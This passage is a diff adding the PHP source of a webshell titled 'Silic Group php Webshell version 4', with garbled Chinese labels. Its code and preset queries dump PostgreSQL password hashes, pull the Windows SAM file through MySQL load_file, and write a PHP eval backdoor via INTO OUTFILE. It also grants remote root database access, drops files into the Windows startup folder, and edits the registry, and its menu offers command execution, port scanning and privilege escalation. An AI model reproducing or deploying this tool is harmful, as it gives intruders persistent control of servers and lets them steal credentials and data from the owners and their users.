+$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : 'sysdba';
+$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : 'masterkey';
+$fbaction = isset($_POST['action']) ? $_POST['action'] : '';
+$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
+$fbquery = stripslashes($fbquery);
+print<<<END
+<form method="POST" name="fbform" action="?s=gg&db=fb">
+<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
+Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
+User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
+Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
+<script language="javascript">
+function fbFull(i){
+Str = new Array(5);
+	Str[0] = "";
+	Str[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
+	Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
+	Str[3] = "input 'D:\\createtable.sql';";
+	Str[4] = "shell netstat -an;";
+fbform.fbsql.value = Str[i];
+return true;
+}
+</script>
+<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
+<select onchange="return fbFull(options[selectedIndex].value)">
+	<option value="0" selected>ִ������</option>
+	<option value="1">����</option>
+	<option value="2">�ֶ�</option>
+	<option value="3">����sql</option>
+	<option value="4">shell</option>
+</select>
+<input type="hidden" name="action" value="fbquery">
+<input class="bt" type="submit" value="Query"></div></form>
+END;
+if ($fbaction == 'fbquery'){
+	$fblink = ibase_connect($fbhost.':'.$fbpath,$fbuser,$fbpass) or die(ibase_errmsg());
+	$fbresult = ibase_query($fblink,$fbquery) or die(ibase_errmsg());
+	echo '<font face="verdana">';
+	echo '<table border="1" cellpadding="1" cellspacing="2">';
+	echo "\n<tr>\n";
+	for ($i=0; $i<ibase_num_fields($fbresult); $i++)
+	{
+	echo '<td bgcolor="#228B22"><b>'.
+	ibase_field_info($fbresult, $i);
+	echo "</b></td>\n"; 
+	}
+	echo "</tr>\n";
+	ibase_field_info($fbresult, 0);
+	while ($fbrow=ibase_fetch_row($fbresult))
+{
+echo "<tr>\n";
+for ($i=0; $i<ibase_num_fields($fbresult); $i++ )
+{
+echo '<td bgcolor="#B8B8E8">';
+echo "$fbrow[$i]";
+echo '</td>';
+}
+echo "</tr>\n";
+}
+echo "</table>\n";
+echo "</font>";
+ibase_free_result($fbresult);
+ibase_close();
+}
+}
+else{
+$pghost = isset($_POST['pghost']) ? $_POST['pghost'] : 'localhost';
+$pguser = isset($_POST['pguser']) ? $_POST['pguser'] : 'postgres';
+$pgpass = isset($_POST['pgpass']) ? $_POST['pgpass'] : '';
+$pgdbname = isset($_POST['pgdbname']) ? $_POST['pgdbname'] : 'postgres';
+$pgaction = isset($_POST['action']) ? $_POST['action'] : '';
+$pgquery = isset($_POST['pgsql']) ? $_POST['pgsql'] : ''; 
+$pgquery = stripslashes($pgquery);
+print<<<END
+<form method="POST" name="pgform" action="?s=gg">
+<div class="actall">Host:<input type="text" name="pghost" value="{$pghost}" style="width:100px;">
+User:<input type="text" name="pguser" vaule="{$pguser}" style="width:100px">
+Pass:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px">
+Dbname:<input type="text" name="pgdbname" value="{$pgdbname}" style="width:100px"><br><br>
+<script language="javascript">
+function pgFull(i){
+Str = new Array(7);
+	Str[0] = "";
+	Str[1] = "select version();";
+	Str[2] = "select datname from pg_database;";
+	Str[3] = "select relname from pg_stat_user_tables limit 1 offset n;";
+	Str[4] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;";
+	Str[5] = "select usename,passwd from pg_shadow;";
+	Str[6] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
+	pgform.pgsql.value = Str[i];
+	return true;
+}
+</script>
+<textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br>
+<select onchange="return pgFull(options[selectedIndex].value)">
+	<option value="0" selected>ִ������</option>
+	<option value="1">��ʾ�汾</option>
+	<option value="2">���ݿ�</option>
+	<option value="3">����</option>
+	<option value="4">�ֶ�</option>
+	<option value="5">hashes</option>
+	<option value="6">pg_hb.conf</option>
+</select>
+<input type="hidden" name="action" value="pgquery">
+<input class="bt" type="submit" value="Query"></div></form>
+END;
+if ($pgaction == 'pgquery'){
+$pgconn = pg_connect("host=$pghost dbname=$pgdbname user=$pguser password=$pgpass ") 
+        or die( 'Could not connect: ' . pg_last_error()); 
+$pgresult = pg_query($pgquery) or die( 'Query failed: '.pg_last_error()); 
+$pgrow=pg_fetch_row($pgresult);
+echo '<font face="verdana">';
+echo '<table border="1" cellpadding="1" cellspacing="2">';
+echo "\n<tr>\n";
+for ($i=0; $i<pg_num_fields($pgresult); $i++)
+{
+echo '<td bgcolor="#228B22"><b>'.
+pg_field_name($pgresult, $i);
+echo "</b></td>\n";
+}
+echo "</tr>\n";
+pg_result_seek($pgresult, 0);
+while ($pgrow=pg_fetch_row($pgresult))
+{
+echo "<tr>\n";
+for ($i=0; $i<pg_num_fields($pgresult); $i++ )
+{
+echo '<td bgcolor="#B8B8E8">';
+echo "$pgrow[$i]";
+echo '</td>';
+}
+echo "</tr>\n";
+}
+echo "</table>\n";
+echo "</font>";
+pg_free_result($pgresult);
+pg_close();
+}
+}
+}
+//WINע�����ȡ
+function phpreg(){
+$shell1 = new COM("wscript.shell") or die("require windows host");
+$action = isset($_POST['action']) ? $_POST['action'] : '';  
+echo '<div class="actall"><h5>Windowsע�����д</h5></div>';
+print<<<END
+<TR><form action="" method="post">   
+<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>   
+·��:<input type="hidden" name="action" value="��ȡ">   
+<input type="text" name="rpath" value="{$rpath}" size="70">   
+<input class="bt" type="submit" value="��ȡ"></form><br></TD></TR></div>   
+END;
+$rpath = isset($_POST['rpath']) ? $_POST['rpath'] : '';   
+$rpath = str_replace("\\\\", "\\", $rpath);      
+if ($action=="read"){
+$out = $shell1->RegRead($rpath);
+echo '<pre>'.var_dump($out).'</pre>';     
+}
+print<<<END
+<TR><form action="" method="post">   
+<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>�:<input type="text" name="wpath" value="{$wpath}" size="70"><BR><br> 
+����:<input type="text" name="wtype" value="{$wtype}" size="20"> ֵ:<input type="text" name="wvalue" value="{$wvalue}" size="30">
+<input type="hidden" name="action" value="write"><input class="bt" type="submit" value="�"></form></TD></TR></div>   
+END;
+$wpath = isset($_POST['wpath']) ? $_POST['wpath'] : '';   
+$wpath = str_replace("\\\\", "\\", $wpath);      
+$wtype = isset($_POST['wtype']) ? $_POST['wtype'] : '';
+$wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : '';
+if($action=="write"){
+$shell1->RegWrite($wpath, $wvalue, $wtype);     
+}
+print<<<END
+<TR><form action="" method="post">   
+<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>  
+�:<input type="hidden" name="action" value="del">   
+<input type="text" name="dpath" value="{$dpath}" size="70">   
+<input class="bt" type="submit" value="ɾ"></form></TD></TR></div>   
+END;
+$dpath = isset($_POST['dpath']) ? $_POST['dpath'] : '';   
+$dpath = str_replace("\\\\", "\\", $dpath);      
+if($action=="del"){
+$out = $shell1->RegDelete($dpath);  
+}
+}
+//MySqlִ��
+function Mysql_n()
+{
+	$MSG_BOX = '';
+	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
+	if(isset($_POST['mhost']) && isset($_POST['muser']))
+	{
+		$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
+		if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
+		else $MSG_BOX = '����MYSQLʧ��';
+	}
+	$downfile = 'c:/windows/repair/sam';
+	if(!empty($_POST['downfile']))
+	{
+		$downfile = File_Str($_POST['downfile']);
+		$binpath = bin2hex($downfile);
+		$query = 'select load_file(0x'.$binpath.')';
+		if($result = @mysql_query($query,$conn))
+		{
+			$k = 0; $downcode = '';
+			while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
+			$filedown = basename($downfile);
+			if(!$filedown) $filedown = 'spider.tmp';
+			$array = explode('.', $filedown);
+			$arrayend = array_pop($array);
+			header('Content-type: application/x-'.$arrayend);
+			header('Content-Disposition: attachment; filename='.$filedown);
+			header('Content-Length: '.strlen($downcode));
+			echo $downcode;
+			exit;
+		}
+		else $MSG_BOX = '�����ļ�ʧ��';
+	}
+	$o = isset($_GET['o']) ? $_GET['o'] : '';
+	Root_CSS();
+print<<<END
+<form method="POST" name="nform" id="nform" action="?s=n&o={$o}" enctype="multipart/form-data">
+<center><div class="actall"><a href="?s=n">[MYSQLִ�����]</a> 
+<a href="?s=n&o=u">[MYSQL�ϴ��ļ�]</a> 
+<a href="?s=n&o=d">[MYSQL�����ļ�]</a></div>
+<div class="actall">
+��ַ <input type="text" name="mhost" value="{$mhost}" style="width:110px">
+�˿� <input type="text" name="mport" value="{$mport}" style="width:110px">
+�û� <input type="text" name="muser" value="{$muser}" style="width:110px">
+���� <input type="text" name="mpass" value="{$mpass}" style="width:110px">
+���� <input type="text" name="mdata" value="{$mdata}" style="width:110px">
+</div>
+<div class="actall" style="height:220px;">
+END;
+if($o == 'u')
+{
+	$uppath = 'C:/Documents and Settings/All Users/����ʼ���˵�/����/����/exp.vbs';
+	if(!empty($_POST['uppath']))
+	{
+		$uppath = $_POST['uppath'];
+		$query = 'Create TABLE a (cmd text NOT NULL);';
+		if(@mysql_query($query,$conn))
+		{
+			if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
+			else{$tmp = File_Str(dirname(__FILE__)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
+			$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
+			if(@mysql_query($query,$conn))
+			{
+				$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
+				$MSG_BOX = @mysql_query($query,$conn) ? '�ϴ��ļ��ɹ�' : '�ϴ��ļ�ʧ��';
+			}
+			else $MSG_BOX = '������ʱ��ʧ��';
+			@mysql_query('Drop TABLE IF EXISTS a;',$conn);
+		}
+		else $MSG_BOX = '������ʱ��ʧ��';
+	}
+print<<<END
+<br><br>�ϴ�·�� <input type="text" name="uppath" value="{$uppath}" style="width:500px">
+<br><br>ѡ���ļ� <input type="file" name="upfile" style="width:500px;height:22px;">
+</div><div class="actall"><input type="submit" value="�ϴ�" style="width:80px;">
+END;
+}
+elseif($o == 'd')
+{
+print<<<END
+<br><br><br>�����ļ� <input type="text" name="downfile" value="{$downfile}" style="width:500px">
+</div><div class="actall"><input type="submit" value="����" style="width:80px;">
+END;
+}
+else
+{
+	if(!empty($_POST['msql']))
+	{
+		$msql = $_POST['msql'];
+		if($result = @mysql_query($msql,$conn))
+		{
+			$MSG_BOX = 'ִ��SQL���ɹ�<br>';
+			$k = 0;
+			while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
+		}
+		else $MSG_BOX .= mysql_error();
+	}
+print<<<END
+<script language="javascript">
+function nFull(i){
+	Str = new Array(11);
+	Str[0] = "select version();";
+	Str[1] = "select load_file(0x633A5C5C626F6F742E696E69) FROM user into outfile 'D://a.txt'";
+	Str[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F://a.php';";
+	Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
+	nform.msql.value = Str[i];
+	return true;
+}
+</script>
+<textarea name="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
+<div class="actall">
+<select onchange="return nFull(options[selectedIndex].value)">
+	<option value="0" selected>��ʾ�汾</option>
+	<option value="1">�����ļ�</option>
+	<option value="2">д���ļ�</option>
+	<option value="3">��������</option>
+</select>
+<input type="submit" value="ִ��" style="width:80px;">
+END;
+}
+	if($MSG_BOX != '') echo '</div><div class="actall">'.$MSG_BOX.'</div></center></form>';
+	else echo '</div></center></form>';
+	return true;
+}
+
+//MYSQL����
+function Mysql_Len($data,$len)
+{
+	if(strlen($data) < $len) return $data;
+	return substr_replace($data,'...',$len);
+}
+function Mysql_Msg()
+{
+	$conn = @mysql_connect($_COOKIE['m_spiderhost'].':'.$_COOKIE['m_spiderport'],$_COOKIE['m_spideruser'],$_COOKIE['m_spiderpass']);
+	if($conn)
+	{
+print<<<END
+<script language="javascript">
+function Delok(msg,gourl)
+{
+	smsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";
+	if(confirm(smsg)){window.location = gourl;}
+}
+function Createok(ac)
+{
+	if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (spider BLOB);';
+	if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
+	if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
+	return false;
+}
+</script>
+END;
+		$BOOL = false;
+		$MSG_BOX = '�û�:'.$_COOKIE['m_spideruser'].' &nbsp;&nbsp;&nbsp;&nbsp; ��ַ:'.$_COOKIE['m_spiderhost'].':'.$_COOKIE['m_spiderport'].' &nbsp;&nbsp;&nbsp;&nbsp; �汾:';
+		$k = 0;
+		$result = @mysql_query('select version();',$conn);
+		while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
+		echo '<div class="actall"> ���ݿ�:';
+		$result = mysql_query("SHOW DATABASES",$conn);
+		while($db = mysql_fetch_array($result)){echo '&nbsp;&nbsp;[<a href="?s=r&db='.$db['Database'].'">'.$db['Database'].'</a>]';}
+		echo '</div>';
+		if(isset($_GET['db']))
+		{
+			mysql_select_db($_GET['db'],$conn);
+			if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? 'ִ�гɹ�' : 'ִ��ʧ�� '.mysql_error();}
+			if(is_array($_POST['insql']))
+			{
+				$query = 'INSERT INTO '.$_GET['table'].' (';
+				foreach($_POST['insql'] as $var => $key)
+				{
+					$querya .= $var.',';
+					$queryb .= '\''.addslashes($key).'\',';
+				}
+				$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
+				$MSG_BOX = mysql_query($query,$conn) ? '���ӳɹ�' : '����ʧ�� '.mysql_error();
+			}
+			if(is_array($_POST['upsql']))
+			{
+				$query = 'UPDATE '.$_GET['table'].' SET ';
+				foreach($_POST['upsql'] as $var => $key)
+				{
+					$queryb .= $var.'=\''.addslashes($key).'\',';
+				}
+				$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
+				$MSG_BOX = mysql_query($query,$conn) ? '�޸ijɹ�' : '�޸�ʧ�� '.mysql_error();
+			}
+			if(isset($_GET['del']))
+			{
+				$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);
+				$good = mysql_fetch_assoc($result);
+				$query = 'DELETE FROM '.$_GET['table'].' WHERE ';
+				foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
+				$where = $query.substr($queryc, 0, -4).';';
+				$MSG_BOX = mysql_query($where,$conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� '.mysql_error();
+			}
+			$action = '?s=r&db='.$_GET['db'];
+			if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� '.mysql_error();}
+			if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
+			if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
+			echo '<div class="actall"><form method="POST" action="'.$action.'">';
+			echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">'.$_POST['nsql'].'</textarea> ';
+			echo '<input type="submit" name="querysql" value="ִ��" style="width:60px;height:49px;"> ';
+			echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
+			echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
+			echo '<input type="button" value="ɾ����" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
+			echo '<div class="msgbox" style="height:40px;">'.$MSG_BOX.'</div><div class="actall"><a href="?s=r&db='.$_GET['db'].'">'.$_GET['db'].'</a> ---> ';
+			if(isset($_GET['table']))
+			{
+				echo '<a href="?s=r&db='.$_GET['db'].'&table='.$_GET['table'].'">'.$_GET['table'].'</a> ';
+				echo '[<a href="?s=r&db='.$_GET['db'].'&insert='.$_GET['table'].'">����</a>]</div>';
+				if(isset($_GET['edit']))
+				{
+					if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
+					echo '<form method="POST" action="?s=r&db='.$_GET['db'].'&table='.$atable.'">';
+					$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);
+					$good = mysql_fetch_assoc($result);
+					$u = 0;
+					foreach($good as $var => $key)
+					{
+						$queryc .= $var.'=\''.$key.'\' AND ';
+						$type = @mysql_field_type($result, $u);
+						$len = @mysql_field_len($result, $u);
+						echo '<div class="actall">'.$var.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="upsql['.$var.']" style="width:600px;height:60px;">'.htmlspecialchars($key).'</textarea></div>';
+						$u++;
+					}
+					$where = 'WHERE '.substr($queryc, 0, -4);
+					echo '<input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'">';
+					echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
+				}
+				else
+				{
+					$query = 'SHOW COLUMNS FROM '.$_GET['table'];
+		      $result = mysql_query($query,$conn);
+		      $fields = array();
+		      $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
+		      if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
+					echo '<table border="0"><tr>';
+					echo '<td class="toptd" style="width:70px;" nowrap>����</td>';
+					while($row = @mysql_fetch_assoc($result))
+					{
+						array_push($fields,$row['Field']);
+						echo '<td class="toptd" nowrap>'.$row['Field'].'</td>';
+					}
+					echo '</tr>';
+					if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
+					$result = mysql_query($query,$conn);
+					$v = $p;
+					while($text = @mysql_fetch_assoc($result))
+					{
+						echo '<tr><td><a href="?s=r&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"> �޸� </a> ';
+						echo '<a href="#" onclick="Delok(\'��\',\'?s=r&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;"> ɾ�� </a></td>';
+						foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';}
+						echo '</tr>'."\r\n";$v++;
+					}
+					echo '</table><div class="actall">';
+					for($i = 1;$i <= ceil($row_num / 20);$i++){$k = ((int)$_GET['p'] == $i) ? '<font color="#FF0000">'.$i.'</font>' : $i;echo '<a href="?s=r&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$i.'">['.$k.']</a> ';}
+					echo '</div>';
+				}
+			}
+			elseif(isset($_GET['insert']))
+			{
+				echo '<a href="?s=r&db='.$_GET['db'].'&table='.$_GET['insert'].'">'.$_GET['insert'].'</a></div>';
+				$result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);
+				$fieldnum = @mysql_num_fields($result);
+				echo '<form method="POST" action="?s=r&db='.$_GET['db'].'&table='.$_GET['insert'].'">';
+				for($i = 0;$i < $fieldnum;$i++)
+				{
+					$name = @mysql_field_name($result, $i);
+					$type = @mysql_field_type($result, $i);
+					$len = @mysql_field_len($result, $i);
+					echo '<div class="actall">'.$name.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="insql['.$name.']" style="width:600px;height:60px;"></textarea></div>';
+				}
+				echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
+			}
+			else
+			{
+				$query = 'SHOW TABLE STATUS';
+				$status = @mysql_query($query,$conn);
+				while($statu = @mysql_fetch_array($status))
+				{
+					$statusize[] = $statu['Data_length'];
+					$statucoll[] = $statu['Collation'];
+				}
+				$query = 'SHOW TABLES FROM '.$_GET['db'].';';
+				echo '</div><table border="0"><tr>';
+				echo '<td class="toptd" style="width:550px;"> ���� </td>';
+				echo '<td class="toptd" style="width:80px;"> ���� </td>';
+				echo '<td class="toptd" style="width:130px;"> �ַ��� </td>';
+				echo '<td class="toptd" style="width:70px;"> ��С </td></tr>';
+				$result = @mysql_query($query,$conn);
+				$k = 0;
+				while($table = mysql_fetch_row($result))
+				{
+					echo '<tr><td><a href="?s=r&db='.$_GET['db'].'&table='.$table[0].'">'.$table[0].'</a></td>';
+					echo '<td><a href="?s=r&db='.$_GET['db'].'&insert='.$table[0].'"> ���� </a> <a href="#" onclick="Delok(\''.$table[0].'\',\'?s=r&db='.$_GET['db'].'&drop='.$table[0].'\');return false;"> ɾ�� </a></td>';
+					echo '<td>'.$statucoll[$k].'</td><td align="right">'.File_Size($statusize[$k]).'</td></tr>'."\r\n";
+					$k++;
+				}
+				echo '</table>';
+			}
+		}
+	}
+	else die('����MYSQLʧ��,�����µ�½.<meta http-equiv="refresh" content="0;URL=?s=o">');
+	if(!$BOOL) echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \''.addslashes($query).'\';</script>';
+	return false;
+}
+function Mysql_o()
+{
+	ob_start();
+  if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
+  {
+  	if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
+	  {
+	  	$cookietime = time() + 24 * 3600;
+	  	setcookie('m_spiderhost',$_POST['mhost'],$cookietime);
+	  	setcookie('m_spiderport',$_POST['mport'],$cookietime);
+	  	setcookie('m_spideruser',$_POST['muser'],$cookietime);
+	  	setcookie('m_spiderpass',$_POST['mpass'],$cookietime);
+	  	die('���ڵ�½,���Ժ�...<meta http-equiv="refresh" content="0;URL=?s=r">');
+	  }
+  }
+print<<<END
+<form method="POST" name="oform" id="oform" action="?s=o">
+<div class="actall">��ַ <input type="text" name="mhost" value="localhost" style="width:300px"></div>
+<div class="actall">�˿� <input type="text" name="mport" value="3306" style="width:300px"></div>
+<div class="actall">�û� <input type="text" name="muser" value="root" style="width:300px"></div>
+<div class="actall">���� <input type="text" name="mpass" value="" style="width:300px"></div>
+<div class="actall"><input type="submit" value="��½" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location='?s=r';"></div>
+</form>
+END;
+	ob_end_flush();
+	return true;
+}
+//��¼
+function Root_Login($MSG_TOP)
+{
+print<<<END
+<html>
+	<body style="background:#AAAAAA;">
+		<center>
+		<form method="POST">
+		<div style="width:351px;height:201px;margin-top:100px;background:threedface;border-color:#FFFFFF #999999 #999999 #FFFFFF;border-style:solid;border-width:1px;">
+		<div style="width:350px;height:22px;padding-top:2px;color:#FFFFFF;background:#293F5F;clear:both;"><b>{$MSG_TOP}</b></div>
+		<div style="width:350px;height:80px;margin-top:50px;color:#000000;clear:both;">PASS:<input type="password" name="spiderpass" style="width:270px;"></div>
+		<div style="width:350px;height:30px;clear:both;"><input type="submit" value="LOGIN" style="width:80px;"></div>
+		</div>
+		</form>
+		</center>
+	</body>
+</html>
+END;
+return false;
+}
+//����
+function WinMain()
+{
+	$Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
+	$Server_OS = PHP_OS;
+	$Server_Soft = $_SERVER["SERVER_SOFTWARE"];
+	$Server_Alexa = 'http://cn.alexa.com/siteinfo/'.str_replace('www.','',$_SERVER['SERVER_NAME']);
+print<<<END
+<html><head><title>Silic Group php Webshell version 4</title>
+<style type="text/css">
+*{padding:0; margin:0;}
+body{background:#AAAAAA;font-family:"Verdana", "Tahoma", "����",sans-serif; font-size:13px; text-align:center;margin-top:5px;word-break:break-all;}
+a{color:#FFFFFF;text-decoration:none;}
+a:hover{background:#BBBBBB;}
+.outtable{margin: 0 auto;height:595px;width:955px;color:#000000;border-top-width: 2px;border-right-width: 2px;border-bottom-width: 2px;border-left-width: 2px;border-top-style: outset;border-right-style: outset;border-bottom-style: outset;border-left-style: outset;border-top-color: #FFFFFF;border-right-color: #8c8c8c;border-bottom-color: #8c8c8c;border-left-color: #FFFFFF;background-color: threedface;}
+.topbg{padding-top:3px;text-align: left;font-size:12px;font-weight: bold;height:22px;width:950px;color:#FFFFFF;background: #293F5F;}
+.bottombg{padding-top:3px;text-align: center;font-size:12px;font-weight: bold;height:22px;width:950px;color:#000000;background: #888888;}
+.listbg{font-family:'lucida grande',tahoma,helvetica,arial,'bitstream vera sans',sans-serif;font-size:13px;width:130px;}
+.listbg li{padding:3px;color:#000000;height:25px;display:block;line-height:26px;text-indent:0px;}
+.listbg li a{padding-top:2px;background:#BBBBBB;color:#000000;height:25px;display:block;line-height:24px;text-indent:0px;border-color:#999999 #999999 #999999 #999999;border-style:solid;border-width:1px;text-decoration:none;}
+</style>
+<script language="JavaScript">
+function switchTab(tabid)
+{
+if(tabid == '') return false;
+for(var i=0;i<=22;i++)
+{
+	if(tabid == 't_'+i) document.getElementById(tabid).style.background="#FFFFFF";
+	else document.getElementById('t_'+i).style.background="#BBBBBB";
+}
+return true;
+}
+</script>
+</head>
+<body>
+<div class="outtable">
+<div class="topbg"> &nbsp; {$Server_IP} - {$Server_OS} - <a href="{$Server_Alexa}" target="_blank">Alexa</a></div>
+	<div style="height:546px;">
+		<table width="100%" height="100%" border=0 cellpadding="0" cellspacing="0">
+		<tr><td width="140" align="center" valign="top">
+			<ul class="listbg">
+			<li><a href="?s=a" id="t_0" onclick="switchTab('t_0')" style="background:#FFFFFF;" target="main">�ļ�����</a></li>
+			<li><a href="?s=g" id="t_6" onclick="switchTab('t_6')" target="main">ִ������</a></li>
+			<li><a href="?s=i" id="t_8" onclick="switchTab('t_8')" target="main">ɨ��˿�</a></li>
+			<li><a href="?s=h" id="t_7" onclick="switchTab('t_7')" target="main">����ӿ�</a></li>
+			<li><a href="?s=f" id="t_5" onclick="switchTab('t_5')" target="main">ϵͳ��Ϣ</a></li>
+			<li><a href="?s=n" id="t_13" onclick="switchTab('t_13')" target="main">MYSQLִ��</a></li>
+			<li><a href="?s=o" id="t_14" onclick="switchTab('t_14')" target="main">MYSQL����</a></li>
+			<li><a href="?s=ee" id="t_19" onclick="switchTab('t_19')" target="main">MYSQL��Ȩ</a></li>
+			<li><a href="?s=gg" id="t_22" onclick="switchTab('t_22')" target="main">�������ݿ�</a></li>
+			<li><a href="?s=e" id="t_4" onclick="switchTab('t_4')" target="main">ɨ��ľ��</a></li>
+			<li><a href="?s=j" id="t_9" onclick="switchTab('t_9')" target="main">�����ļ�</a></li>
+			<li><a href="?s=b" id="t_1" onclick="switchTab('t_1')" target="main">��������</a></li>
+			<li><a href="?s=c" id="t_2" onclick="switchTab('t_2')" target="main">��������</a></li>
+			<li><a href="?s=d" id="t_3" onclick="switchTab('t_3')" target="main">�����滻</a></li>
+			<li><a href="?s=hh" id="t_12" onclick="switchTab('t_12')" target="main">WINע���</a></li>
+			<li><a href="?s=l" id="t_11" onclick="switchTab('t_11')" target="main">ServU��Ȩ</a></li>
+			<li><a href="?s=dd" id="t_18" onclick="switchTab('t_18')" target="main">php��������</a></li>
+			<li><a href="?s=k" id="t_10" onclick="switchTab('t_10')" target="main">Linux��������</a></li>
+			<li><a href="?s=aa" id="t_21" onclick="switchTab('t_21')" target="main">FTP����</a></li>
+			<li><a href="?s=cc" id="t_17" onclick="switchTab('t_17')" target="main">������̽��</a></li>
+			<li><a href="?s=bb" id="t_16" onclick="switchTab('t_16')" target="main">shellcode</a></li>
+			<li><a href="?s=ff" id="t_20" onclick="switchTab('t_20')" target="main">ִ��php����</a></li>
+			<li><a href="?s=logout" id="t_15" onclick="switchTab('t_15')">�˳�ϵͳ</a></li></ul></td><td>
+<iframe name="main" src="?s=a" width="100%" height="100%" frameborder="0"></iframe></td></tr></table></div>
+<div class="bottombg">{$Server_Soft}</div></div></body></html>
+END;
+return false;
+}
+if(get_magic_quotes_gpc())
+{
+	$_GET = Root_GP($_GET);
+	$_POST = Root_GP($_POST);
+}
+if($_GET['s'] == 'logout')
+{
+	setcookie('admin_spiderpass',NULL);
+	die('<meta http-equiv="refresh" content="0;URL=?">');
+}
+if($_COOKIE['admin_spiderpass'] != md5($password))
+{
+	ob_start();
+	$MSG_TOP = 'LOGIN';
+	if(isset($_POST['spiderpass']))
+	{
+		$cookietime = time() + 24 * 3600;
+		setcookie('admin_spiderpass',md5($_POST['spiderpass']),$cookietime);
+		if(md5($_POST['spiderpass']) == md5($password)){die('<meta http-equiv="refresh" content="1;URL=?">');}
+		else{$MSG_TOP = 'PASS IS FALSE';}
+	}
+Root_Login($MSG_TOP);
+ob_end_flush();
+exit;
+}
+if(isset($_GET['s'])){$s = $_GET['s'];if($s != 'a' && $s != 'n')Root_CSS();}else{$s = 'MyNameIsHacker';}
+$p = isset($_GET['p']) ? $_GET['p'] : File_Str(dirname(__FILE__));
